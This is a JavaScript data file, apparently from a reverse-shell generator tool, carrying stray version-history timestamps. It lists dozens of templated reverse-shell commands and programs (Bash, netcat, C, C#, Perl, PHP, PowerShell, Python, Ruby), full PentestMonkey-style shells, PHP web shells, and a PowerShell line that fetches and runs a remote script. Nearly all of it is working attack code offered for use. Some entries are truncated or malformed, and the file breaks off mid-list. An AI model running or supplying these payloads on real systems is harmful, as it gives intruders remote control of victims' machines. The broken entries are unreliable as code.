2021-11-20 01:22:32 +00:00
2021-09-09 12:03:42 +00:00
const CommandType = {
'ReverseShell' : 'ReverseShell' ,
'BindShell' : 'BindShell' ,
2023-02-15 20:02:38 +00:00
'MSFVenom' : 'MSFVenom' ,
'HoaxShell' : 'HoaxShell'
2021-09-09 12:03:42 +00:00
} ;
const withCommandType = function ( commandType , elements ) {
return elements . map ( ( element ) => {
return {
... element ,
meta : [
... element . meta ,
commandType
]
}
} ) ;
}
const reverseShellCommands = withCommandType (
CommandType . ReverseShell ,
[
{
"name" : "Bash -i" ,
"command" : "{shell} -i >& /dev/tcp/{ip}/{port} 0>&1" ,
"meta" : [ "linux" , "mac" ]
} ,
{
"name" : "Bash 196" ,
"command" : "0<&196;exec 196<>/dev/tcp/{ip}/{port}; {shell} <&196 >&196 2>&196" ,
"meta" : [ "linux" , "mac" ]
} ,
{
"name" : "Bash read line" ,
"command" : "exec 5<>/dev/tcp/{ip}/{port};cat <&5 | while read line; do $line 2>&5 >&5; done" ,
"meta" : [ "linux" , "mac" ]
} ,
{
"name" : "Bash 5" ,
"command" : "{shell} -i 5<> /dev/tcp/{ip}/{port} 0<&5 1>&5 2>&5" ,
"meta" : [ "linux" , "mac" ]
} ,
{
"name" : "Bash udp" ,
"command" : "{shell} -i >& /dev/udp/{ip}/{port} 0>&1" ,
"meta" : [ "linux" , "mac" ]
} ,
{
"name" : "nc mkfifo" ,
"command" : "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|{shell} -i 2>&1|nc {ip} {port} >/tmp/f" ,
"meta" : [ "linux" , "mac" ]
} ,
{
"name" : "nc -e" ,
2022-10-09 15:40:11 +00:00
"command" : "nc {ip} {port} -e {shell}" ,
2021-09-09 12:03:42 +00:00
"meta" : [ "linux" , "mac" ]
} ,
{
"name" : "nc.exe -e" ,
2022-10-09 15:40:11 +00:00
"command" : "nc.exe {ip} {port} -e {shell}" ,
2021-09-09 12:03:42 +00:00
"meta" : [ "windows" ]
} ,
2022-12-23 18:12:51 +00:00
{
"name" : "BusyBox nc -e" ,
"command" : "busybox nc {ip} {port} -e {shell}" ,
"meta" : [ "linux" ]
} ,
2021-09-09 12:03:42 +00:00
{
"name" : "nc -c" ,
"command" : "nc -c {shell} {ip} {port}" ,
"meta" : [ "linux" , "mac" ]
} ,
{
"name" : "ncat -e" ,
"command" : "ncat {ip} {port} -e {shell}" ,
"meta" : [ "linux" , "mac" ]
} ,
{
"name" : "ncat.exe -e" ,
"command" : "ncat.exe {ip} {port} -e {shell}" ,
"meta" : [ "windows" ]
} ,
{
"name" : "ncat udp" ,
"command" : "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|{shell} -i 2>&1|ncat -u {ip} {port} >/tmp/f" ,
"meta" : [ "linux" , "mac" ]
} ,
{
"name" : "rustcat" ,
2021-10-03 08:43:55 +00:00
"command" : "rcat {ip} {port} -r {shell}" ,
2021-09-09 12:03:42 +00:00
"meta" : [ "linux" , "mac" ]
} ,
{
"name" : "C" ,
"command" : "#include <stdio.h>\n#include <sys/socket.h>\n#include <sys/types.h>\n#include <stdlib.h>\n#include <unistd.h>\n#include <netinet/in.h>\n#include <arpa/inet.h>\n\nint main(void){\n int port = {port};\n struct sockaddr_in revsockaddr;\n\n int sockt = socket(AF_INET, SOCK_STREAM, 0);\n revsockaddr.sin_family = AF_INET; \n revsockaddr.sin_port = htons(port);\n revsockaddr.sin_addr.s_addr = inet_addr(\"{ip}\");\n\n connect(sockt, (struct sockaddr *) &revsockaddr, \n sizeof(revsockaddr));\n dup2(sockt, 0);\n dup2(sockt, 1);\n dup2(sockt, 2);\n\n char * const argv[] = {\"{shell}\", NULL};\n execve(\"{shell}\", argv, NULL);\n\n return 0; \n}" ,
"meta" : [ "linux" , "mac" ]
} ,
{
"name" : "C Windows" ,
"command" : "#include <winsock2.h>\r\n#include <stdio.h>\r\n#pragma comment(lib,\"ws2_32\")\r\n\r\nWSADATA wsaData;\r\nSOCKET Winsock;\r\nstruct sockaddr_in hax; \r\nchar ip_addr[16] = \"{ip}\"; \r\nchar port[6] = \"{port}\"; \r\n\r\nSTARTUPINFO ini_processo;\r\n\r\nPROCESS_INFORMATION processo_info;\r\n\r\nint main()\r\n{\r\n WSAStartup(MAKEWORD(2, 2), &wsaData);\r\n Winsock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, (unsigned int)NULL, (unsigned int)NULL);\r\n\r\n\r\n struct hostent *host; \r\n host = gethostbyname(ip_addr);\r\n strcpy_s(ip_addr, inet_ntoa(*((struct in_addr *)host->h_addr)));\r\n\r\n hax.sin_family = AF_INET;\r\n hax.sin_port = htons(atoi(port));\r\n hax.sin_addr.s_addr = inet_addr(ip_addr);\r\n\r\n WSAConnect(Winsock, (SOCKADDR*)&hax, sizeof(hax), NULL, NULL, NULL, NULL);\r\n\r\n memset(&ini_processo, 0, sizeof(ini_processo));\r\n ini_processo.cb = sizeof(ini_processo);\r\n ini_processo.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW; \r\n ini_processo.hStdInput = ini_processo.hStdOutput = ini_processo.hStdError = (HANDLE)Winsock;\r\n\r\n TCHAR cmd[255] = TEXT(\"cmd.exe\");\r\n\r\n CreateProcess(NULL, cmd, NULL, NULL, TRUE, 0, NULL, NULL, &ini_processo, &processo_info);\r\n\r\n return 0;\r\n}" ,
"meta" : [ "windows" ]
} ,
{
2022-08-27 11:59:18 +00:00
"name" : "C# TCP Client" ,
"command" : "using System;\nusing System.Text;\nusing System.IO;\nusing System.Diagnostics;\nusing System.ComponentModel;\nusing System.Linq;\nusing System.Net;\nusing System.Net.Sockets;\n\n\nnamespace ConnectBack\n{\n\tpublic class Program\n\t{\n\t\tstatic StreamWriter streamWriter;\n\n\t\tpublic static void Main(string[] args)\n\t\t{\n\t\t\tusing(TcpClient client = new TcpClient(\"{ip}\", {port}))\n\t\t\t{\n\t\t\t\tusing(Stream stream = client.GetStream())\n\t\t\t\t{\n\t\t\t\t\tusing(StreamReader rdr = new StreamReader(stream))\n\t\t\t\t\t{\n\t\t\t\t\t\tstreamWriter = new StreamWriter(stream);\n\t\t\t\t\t\t\n\t\t\t\t\t\tStringBuilder strInput = new StringBuilder();\n\n\t\t\t\t\t\tProcess p = new Process();\n\t\t\t\t\t\tp.StartInfo.FileName = \"{shell}\";\n\t\t\t\t\t\tp.StartInfo.CreateNoWindow = true;\n\t\t\t\t\t\tp.StartInfo.UseShellExecute = false;\n\t\t\t\t\t\tp.StartInfo.RedirectStandardOutput = true;\n\t\t\t\t\t\tp.StartInfo.RedirectStandardInput = true;\n\t\t\t\t\t\tp.StartInfo.RedirectStandardError = true;\n\t\t\t\t\t\tp.OutputDataReceived += new DataReceivedEventHandler(CmdOutputDataHandler);\n\t\t\t\t\t\tp.Start();\n\t\t\t\t\t\tp.BeginOutputReadLine();\n\n\t\t\t\t\t\twhile(true)\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\tstrInput.Append(rdr.ReadLine());\n\t\t\t\t\t\t\t//strInput.Append(\"\\n\");\n\t\t\t\t\t\t\tp.StandardInput.WriteLine(strInput);\n\t\t\t\t\t\t\tstrInput.Remove(0, strInput.Length);\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\n\t\tprivate static void CmdOutputDataHandler(object sendingProcess, DataReceivedEventArgs outLine)\n {\n StringBuilder strOutput = new StringBuilder();\n\n if (!String.IsNullOrEmpty(outLine.Data))\n {\n try\n {\n strOutput.Append(outLine.Data);\n streamWriter.WriteLine(strOutput);\n streamWriter.Flush();\n }\n catch (Exception err) { }\n }\n }\n\n\t}\n}" ,
"meta" : [ "linux" , "windows" ]
} ,
{
"name" : "C# Bash -i" ,
"command" : "using System;\nusing System.Diagnostics;\n\nnamespace BackConnect {\n class ReverseBash {\n\tpublic static void Main(string[] args) {\n\t Process proc = new System.Diagnostics.Process();\n\t proc.StartInfo.FileName = \"{shell}\";\n\t proc.StartInfo.Arguments = \"-c \\\"{shell} -i >& /dev/tcp/{ip}/{port} 0>&1\\\"\";\n\t proc.StartInfo.UseShellExecute = false;\n\t proc.StartInfo.RedirectStandardOutput = true;\n\t proc.Start();\n\n\t while (!proc.StandardOutput.EndOfStream) {\n\t\tConsole.WriteLine(proc.StandardOutput.ReadLine());\n\t }\n\t}\n }\n}\n" ,
2021-09-09 12:03:42 +00:00
"meta" : [ "linux" , "windows" ]
} ,
{
"name" : "Haskell #1" ,
"command" : "module Main where\n\nimport System.Process\n\nmain = callCommand \"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | {shell} -i 2>&1 | nc {ip} {port} >/tmp/f\"" ,
"meta" : [ "linux" , "mac" ]
} ,
{
"name" : "Perl" ,
"command" : "perl -e 'use Socket;$i=\"{ip}\";$p={port};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"{shell} -i\");};'" ,
"meta" : [ "linux" , "mac" ]
} ,
{
"name" : "Perl no sh" ,
"command" : "perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,\"{ip}:{port}\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'" ,
"meta" : [ "linux" , "mac" ]
} ,
2022-10-10 23:30:34 +00:00
{
"name" : "Perl PentestMonkey" ,
"command" : ` #!/usr/bin/perl -w \n # perl-reverse-shell - A Reverse Shell implementation in PERL \n # Copyright (C) 2006 pentestmonkey@pentestmonkey.net \n # \n # This tool may be used for legal purposes only. Users take full responsibility \n # for any actions performed using this tool. The author accepts no liability \n # for damage caused by this tool. If these terms are not acceptable to you, then \n # do not use this tool. \n # \n # In all other respects the GPL version 2 applies: \n # \n # This program is free software; you can redistribute it and/or modify \n # it under the terms of the GNU General Public License version 2 as \n # published by the Free Software Foundation. \n # \n # This program is distributed in the hope that it will be useful, \n # but WITHOUT ANY WARRANTY; without even the implied warranty of \n # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the \n # GNU General Public License for more details. \n # \n # You should have received a copy of the GNU General Public License along \n # with this program; if not, write to the Free Software Foundation, Inc., \n # 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. \n # \n # This tool may be used for legal purposes only. Users take full responsibility \n # for any actions performed using this tool. If these terms are not acceptable to \n # you, then do not use this tool. \n # \n # You are encouraged to send comments, improvements or suggestions to \n # me at pentestmonkey@pentestmonkey.net \n # \n # Description \n # ----------- \n # This script will make an outbound TCP connection to a hardcoded IP and port. \n # The recipient will be given a shell running as the current user (apache normally). \n # \n \n use strict; \n use Socket; \n use FileHandle; \n use POSIX; \n my $ VERSION = "1.0"; \n \n # Where to send the reverse shell. Change these. \n my $ ip = '{ip}'; \n my $ port = {port}; \n \n # Options \n my $ daemon = 1; \n my $ auth = 0; # 0 means authentication is disabled and any \n # source IP can access the reverse shell \n my $ authorised_client_pattern = qr(^127 \\ .0 \\ .0 \\ .1 $ ); \n \n # Declarations \n my $ global_page = ""; \n my $ fake_process_name = "/usr/sbin/apache"; \n \n # Change the process name to be less conspicious \n $ 0 = "[httpd]"; \n \n # Authenticate based on source IP address if required \n if (defined( $ ENV{'REMOTE_ADDR'})) { \n cgiprint("Browser IP address appears to be: $ ENV{'REMOTE_ADDR'}"); \n \n if ( $ auth) { \n unless ( $ ENV{'REMOTE_ADDR'} =~ $ authorised_client_pattern) { \n cgiprint("ERROR: Your client isn't authorised to view this page"); \n cgiexit(); \n } \n } \n } elsif ( $ auth) { \n cgiprint("ERROR: Authentication is enabled, but I couldn't determine your IP address. Denying access"); \n cgiexit(0); \n } \n \n # Background and dissociate from parent process if required \n if ( $ daemon) { \n my $ pid = fork(); \n if ( $ pid) { \n cgiexit(0); # parent exits \n } \n \n setsid(); \n chdir('/'); \n umask(0); \n } \n \n # Make TCP connection for reverse shell \n socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname('tcp')); \n if (connect(SOCK, sockaddr_in( $ port,inet_aton( $ ip)))) { \n cgiprint("Sent reverse shell to $ ip: $ port"); \n cgiprintpage(); \n } else { \n cgiprint("Couldn't open reverse shell to $ ip: $ port: $ !"); \n cgiexit(); \n } \n \n # Redirect STDIN, STDOUT and STDERR to the TCP connection \n open(STDIN, ">&SOCK"); \n open(STDOUT,">&SOCK"); \n open(STDERR,">&SOCK"); \n $ ENV{'HISTFILE'} = '/dev/null'; \n system("w;uname -a;id;pwd"); \n exec({"{shell}"} ( $ fake_process_name, "-i")); \n \n # Wrapper around print \n sub cgiprint { \n my $ line = shift; \n $ line .= "<p> \\ n"; \n $ global_page .= $ line; \n } \n \n # Wrapper around exit \n sub cgiexit { \n cgiprintpage(); \n exit 0; # 0 to ensure we don't give a 500 response. \n } \n \n # Form HTTP response using all the messages gathered by cgiprint so far \n sub cgiprintpage { \n print "Content-Length: " . length( $ global_page) . " \\ r \n Connection: close \\ r \n Content-Type: text \\ /html \\ r \\ n \\ r \\ n" . $ global_page; \n } \n ` ,
"meta" : [ "linux" , "mac" ]
} ,
2023-01-19 20:33:57 +00:00
// {
// "name": "PHP Emoji",
// "command": "php -r '$😀=\"1\";$😁=\"2\";$😅=\"3\";$😆=\"4\";$😉=\"5\";$😊=\"6\";$😎=\"7\";$😍=\"8\";$😚=\"9\";$🙂=\"0\";$🤢=\" \";$🤓=\"<\";$🤠=\">\";$😱=\"-\";$😵=\"&\";$🤩=\"i\";$🤔=\".\";$🤨=\"/\";$🥰=\"a\";$😐=\"b\";$😶=\"i\";$🙄=\"h\";$😂=\"c\";$🤣=\"d\";$😃=\"e\";$😄=\"f\";$😋=\"k\";$😘=\"n\";$😗=\"o\";$😙=\"p\";$🤗=\"s\";$😑=\"x\";$💀 = $😄. $🤗. $😗. $😂. $😋. $😗. $😙. $😃. $😘;$🚀 = \"{ip}\";$💻 = {port};$🐚 = \"{shell}\". $🤢. $😱. $🤩. $🤢. $🤓. $😵. $😅. $🤢. $🤠. $😵. $😅. $🤢. $😁. $🤠. $😵. $😅;$🤣 = $💀($🚀,$💻);$👽 = $😃. $😑. $😃. $😂;$👽($🐚);'",
// "meta": ["linux", "mac"]
// },
2021-09-09 12:03:42 +00:00
{
"name" : "PHP PentestMonkey" ,
"command" : "<?php\n// php-reverse-shell - A Reverse Shell implementation in PHP. Comments stripped to slim it down. RE: https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php\n// Copyright (C) 2007 pentestmonkey@pentestmonkey.net\n\nset_time_limit (0);\n$VERSION = \"1.0\";\n$ip = '{ip}';\n$port = {port};\n$chunk_size = 1400;\n$write_a = null;\n$error_a = null;\n$shell = 'uname -a; w; id; {shell} -i';\n$daemon = 0;\n$debug = 0;\n\nif (function_exists('pcntl_fork')) {\n\t$pid = pcntl_fork();\n\t\n\tif ($pid == -1) {\n\t\tprintit(\"ERROR: Can't fork\");\n\t\texit(1);\n\t}\n\t\n\tif ($pid) {\n\t\texit(0); // Parent exits\n\t}\n\tif (posix_setsid() == -1) {\n\t\tprintit(\"Error: Can't setsid()\");\n\t\texit(1);\n\t}\n\n\t$daemon = 1;\n} else {\n\tprintit(\"WARNING: Failed to daemonise. This is quite common and not fatal.\");\n}\n\nchdir(\"/\");\n\numask(0);\n\n// Open reverse connection\n$sock = fsockopen($ip, $port, $errno, $errstr, 30);\nif (!$sock) {\n\tprintit(\"$errstr ($errno)\");\n\texit(1);\n}\n\n$descriptorspec = array(\n 0 => array(\"pipe\", \"r\"), // stdin is a pipe that the child will read from\n 1 => array(\"pipe\", \"w\"), // stdout is a pipe that the child will write to\n 2 => array(\"pipe\", \"w\") // stderr is a pipe that the child will write to\n);\n\n$process = proc_open($shell, $descriptorspec, $pipes);\n\nif (!is_resource($process)) {\n\tprintit(\"ERROR: Can't spawn shell\");\n\texit(1);\n}\n\nstream_set_blocking($pipes[0], 0);\nstream_set_blocking($pipes[1], 0);\nstream_set_blocking($pipes[2], 0);\nstream_set_blocking($sock, 0);\n\nprintit(\"Successfully opened reverse shell to $ip:$port\");\n\nwhile (1) {\n\tif (feof($sock)) {\n\t\tprintit(\"ERROR: Shell connection terminated\");\n\t\tbreak;\n\t}\n\n\tif (feof($pipes[1])) {\n\t\tprintit(\"ERROR: Shell process terminated\");\n\t\tbreak;\n\t}\n\n\t$read_a = array($sock, $pipes[1], $pipes[2]);\n\t$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);\n\n\tif (in_array($sock, $read_a)) {\n\t\tif ($debug) printit(\"SOCK READ\");\n\t\t$input = fread($sock, $chunk_size);\n\t\tif ($debug) printit(\"SOCK: $input\");\n\t\tfwrite($pipes[0], $input);\n\t}\n\n\tif (in_array($pipes[1], $read_a)) {\n\t\tif ($debug) printit(\"STDOUT READ\");\n\t\t$input = fread($pipes[1], $chunk_size);\n\t\tif ($debug) printit(\"STDOUT: $input\");\n\t\tfwrite($sock, $input);\n\t}\n\n\tif (in_array($pipes[2], $read_a)) {\n\t\tif ($debug) printit(\"STDERR READ\");\n\t\t$input = fread($pipes[2], $chunk_size);\n\t\tif ($debug) printit(\"STDERR: $input\");\n\t\tfwrite($sock, $input);\n\t}\n}\n\nfclose($sock);\nfclose($pipes[0]);\nfclose($pipes[1]);\nfclose($pipes[2]);\nproc_close($process);\n\nfunction printit ($string) {\n\tif (!$daemon) {\n\t\tprint \"$string\\n\";\n\t}\n}\n\n?>" ,
"meta" : [ "linux" , "windows" , "mac" ]
} ,
{
"name" : "PHP Ivan Sincek" ,
"command" : "<?php\n// Copyright (c) 2020 Ivan Sincek\n// v2.3\n// Requires PHP v5.0.0 or greater.\n// Works on Linux OS, macOS, and Windows OS.\n// See the original script at https://github.com/pentestmonkey/php-reverse-shell.\nclass Shell {\n private $addr = null;\n private $port = null;\n private $os = null;\n private $shell = null;\n private $descriptorspec = array(\n 0 => array(\'pipe\', \'r\'), // shell can read from STDIN\n 1 => array(\'pipe\', \'w\'), // shell can write to STDOUT\n 2 => array(\'pipe\', \'w\') // shell can write to STDERR\n );\n private $buffer = 1024; // read/write buffer size\n private $clen = 0; // command length\n private $error = false; // stream read/write error\n public function __construct($addr, $port) {\n $this->addr = $addr;\n $this->port = $port;\n }\n private function detect() {\n $detected = true;\n if (stripos(PHP_OS, \'LINUX\') !== false) { // same for macOS\n $this->os = \'LINUX\';\n $this->shell = \'{shell}\';\n } else if (stripos(PHP_OS, \'WIN32\') !== false || stripos(PHP_OS, \'WINNT\') !== false || stripos(PHP_OS, \'WINDOWS\') !== false) {\n $this->os = \'WINDOWS\';\n $this->shell = \'cmd.exe\';\n } else {\n $detected = false;\n echo \"SYS_ERROR: Underlying operating system is not supported, script will now exit...\\n\";\n }\n return $detected;\n }\n private function daemonize() {\n $exit = false;\n if (!function_exists(\'pcntl_fork\')) {\n echo \"DAEMONIZE: pcntl_fork() does not exists, moving on...\\n\";\n } else if (($pid = @pcntl_fork()) < 0) {\n echo \"DAEMONIZE: Cannot fork off the parent process, moving on...\\n\";\n } else if ($pid > 0) {\n $exit = true;\n echo \"DAEMONIZE: Child process forked off successfully, parent process will now exit...\\n\";\n } else if (posix_setsid() < 0) {\n // once daemonized you will actually no longer see the script\'s dump\n echo \"DAEMONIZE: Forked off the parent process but cannot set a new SID, moving on as an orphan...\\n\";\n } else {\n echo \"DAEMONIZE: Completed successfully!\\n\";\n }\n return $exit;\n }\n private function settings() {\n @error_reporting(0);\n @set_time_limit(0); // do not impose the script execution time limit\n @umask(0); // set the file/directory permissions - 666 for files and 777 for directories\n }\n private function dump($data) {\n $data = str_replace(\'<\', \'<\', $data);\n $data = str_replace(\'>\', \'>\', $data);\n echo $data;\n }\n private function read($stream, $name, $buffer) {\n if (($data = @fread($stream, $buffer)) === false) { // suppress an error when reading from a closed blocking stream\n $this->error = true; // set global error flag\n echo \"STRM_ERROR: Cannot read from ${name}, script will now exit...\\n\";\n }\n return $data;\n }\n private function write($stream, $name, $data) {\n if (($bytes = @fwrite($stream, $data)) === false) { // suppress an error when writing to a closed blocking stream\n $this->error = true; // set global error flag\n echo \"STRM_ERROR: Cannot write to ${name}, script will now exit...\\n\" ; \ n } \ n return $bytes ; \ n } \ n // read/write method for non-blocking streams\n private function rw($input, $output, $iname, $oname) {\n while (($data = $this->read($input, $iname, $this->buffer)) && $this->write($output, $oname, $data)) {\n if ($this->os === \'WINDOWS\' && $oname === \'STDIN\') { $this->clen += strlen($data); } // calculate the command length\n $this->dump($data); // script\'s dump\n }\n }\n // read/write method for blocking streams (e.g. for STDOUT and STDE
"meta" : [ "linux" , "windows" , "mac" ]
2022-03-19 20:44:03 +00:00
} ,
2021-09-09 12:03:42 +00:00
{
"name" : "PHP cmd" ,
"command" : "<html>\n<body>\n<form method=\"GET\" name=\"<?php echo basename($_SERVER[\'PHP_SELF\']); ?>\">\n<input type=\"TEXT\" name=\"cmd\" id=\"cmd\" size=\"80\">\n<input type=\"SUBMIT\" value=\"Execute\">\n<\/form>\n<pre>\n<?php\n if(isset($_GET[\'cmd\']))\n {\n system($_GET[\'cmd\']);\n }\n?>\n<\/pre>\n<\/body>\n<script>document.getElementById(\"cmd\").focus();<\/script>\n<\/html>" ,
"meta" : [ "linux" , "windows" , "mac" ]
} ,
2023-01-14 16:05:27 +00:00
{
"name" : "PHP cmd 2" ,
"command" : "<?php if(isset($_REQUEST[\'cmd\'])){ echo \"<pre>\"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo \"<\/pre>\"; die; }?>" ,
"meta" : [ "linux" , "windows" , "mac" ]
} ,
{
"name" : "PHP cmd small" ,
"command" : "<?=`$_GET[0]`?>" ,
"meta" : [ "linux" , "windows" , "mac" ]
} ,
2021-09-09 12:03:42 +00:00
{
"name" : "PHP exec" ,
"command" : "php -r '$sock=fsockopen(\"{ip}\",{port});exec(\"{shell} <&3 >&3 2>&3\");'" ,
"meta" : [ "linux" , , "mac" ]
} ,
{
"name" : "PHP shell_exec" ,
"command" : "php -r '$sock=fsockopen(\"{ip}\",{port});shell_exec(\"{shell} <&3 >&3 2>&3\");'" ,
"meta" : [ "linux" , "mac" ]
} ,
{
"name" : "PHP system" ,
"command" : "php -r '$sock=fsockopen(\"{ip}\",{port});system(\"{shell} <&3 >&3 2>&3\");'" ,
"meta" : [ "linux" , "windows" , "mac" ]
} ,
{
"name" : "PHP passthru" ,
"command" : "php -r '$sock=fsockopen(\"{ip}\",{port});passthru(\"{shell} <&3 >&3 2>&3\");'" ,
"meta" : [ "linux" , "mac" ]
} ,
{
"name" : "PHP `" ,
"command" : "php -r '$sock=fsockopen(\"{ip}\",{port});`{shell} <&3 >&3 2>&3`;'" ,
"meta" : [ "linux" , "windows" , "mac" ]
} ,
{
"name" : "PHP popen" ,
"command" : "php -r '$sock=fsockopen(\"{ip}\",{port});popen(\"{shell} <&3 >&3 2>&3\", \"r\");'" ,
"meta" : [ "linux" , "windows" , "mac" ]
} ,
{
"name" : "PHP proc_open" ,
"command" : "php -r '$sock=fsockopen(\"{ip}\",{port});$proc=proc_open(\"{shell}\", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'" ,
"meta" : [ "linux" , "windows" , "mac" ]
} ,
{
"name" : "Windows ConPty" ,
"command" : "IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell {ip} {port}" ,
"meta" : [ "windows" ]
} ,
{
"name" : "PowerShell #1" ,
"command" : "powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient(\"{ip}\",{port});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + \"PS \" + (pwd).Path + \"> \";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" ,
"meta" : [ "windows" ]
} ,
{
"name" : "PowerShell #2" ,
"command" : "powershell -nop -c \"$client = New-Object System.Net.Sockets.TCPClient('{ip}',{port});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\"" ,
"meta" : [ "windows" ]
} ,
{
"name" : "PowerShell #3" ,
"command" : "powershell -nop -W hidden -noni -ep bypass -c \"$TCPClient = New-Object Net.Sockets.TCPClient('{ip}', {port});$NetworkStream = $TCPClient.GetStream();$StreamWriter = New-Object IO.StreamWriter($NetworkStream);function WriteToStream ($String) {[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0};$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()}WriteToStream '';while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()\"" ,
"meta" : [ "windows" ]
} ,
{
"name" : "PowerShell #4 (TLS)" ,
"command" : "powershell -nop -W hidden -noni -ep bypass -c \"$TCPClient = New-Object Net.Sockets.TCPClient('{ip}', {port});$NetworkStream = $TCPClient.GetStream();$SslStream = New-Object Net.Security.SslStream($NetworkStream,$false,({$true} -as [Net.Security.RemoteCertificateValidationCallback]));$SslStream.AuthenticateAsClient('cloudflare-dns.com',$null,$false);if(!$SslStream.IsEncrypted -or !$SslStream.IsSigned) {$SslStream.Close();exit}$StreamWriter = New-Object IO.StreamWriter($SslStream);function WriteToStream ($String) {[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0};$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()};WriteToStream '';while(($BytesRead = $SslStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()\"" ,
"meta" : [ "windows" ]
} ,
{
"name" : "PowerShell #3 (Base64)" ,
"meta" : [ "windows" ]
} ,
{
"name" : "Python #1" ,
"command" : "export RHOST=\"{ip}\";export RPORT={port};python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv(\"RHOST\"),int(os.getenv(\"RPORT\"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"{shell}\")'" ,
"meta" : [ "linux" , "mac" ]
} ,
{
"name" : "Python #2" ,
"command" : "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"{ip}\",{port}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"{shell}\")'" ,
"meta" : [ "linux" , "mac" ]
} ,
{
"name" : "Python3 #1" ,
"command" : "export RHOST=\"{ip}\";export RPORT={port};python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv(\"RHOST\"),int(os.getenv(\"RPORT\"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"{shell}\")'" ,
"meta" : [ "linux" , "mac" ]
} ,
{
"name" : "Python3 #2" ,
"command" : "python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"{ip}\",{port}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"{shell}\")'" ,
"meta" : [ "linux" , "mac" ]
} ,
2022-09-02 21:04:48 +00:00
{
"name" : "Python3 Windows" ,
2022-09-05 13:16:29 +00:00
"command" : "import os,socket,subprocess,threading;\ndef s2p(s, p):\n while True:\n data = s.recv(1024)\n if len(data) > 0:\n p.stdin.write(data)\n p.stdin.flush()\n\ndef p2s(s, p):\n while True:\n s.send(p.stdout.read(1))\n\ns=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\ns.connect((\"{ip}\",{port}))\n\np=subprocess.Popen([\"{shell}\"], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE)\n\ns2p_thread = threading.Thread(target=s2p, args=[s, p])\ns2p_thread.daemon = True\ns2p_thread.start()\n\np2s_thread = threading.Thread(target=p2s, args=[s, p])\np2s_thread.daemon = True\np2s_thread.start()\n\ntry:\n p.wait()\nexcept KeyboardInterrupt:\n s.close()" ,
2022-09-02 21:04:48 +00:00
"meta" : [ "windows" ]
} ,
2021-09-09 12:03:42 +00:00
{
"name" : "Python3 shortest" ,
"command" : "python3 -c 'import os,pty,socket;s=socket.socket();s.connect((\"{ip}\",{port}));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(\"{shell}\")'" ,
"meta" : [ "linux" ]
} ,
{
"name" : "Ruby #1" ,
"command" : "ruby -rsocket -e'spawn(\"sh\",[:in,:out,:err]=>TCPSocket.new(\"{ip}\",{port}))'" ,
"meta" : [ "linux" , "mac" ]
} ,
{
"name" : "Ruby no sh" ,
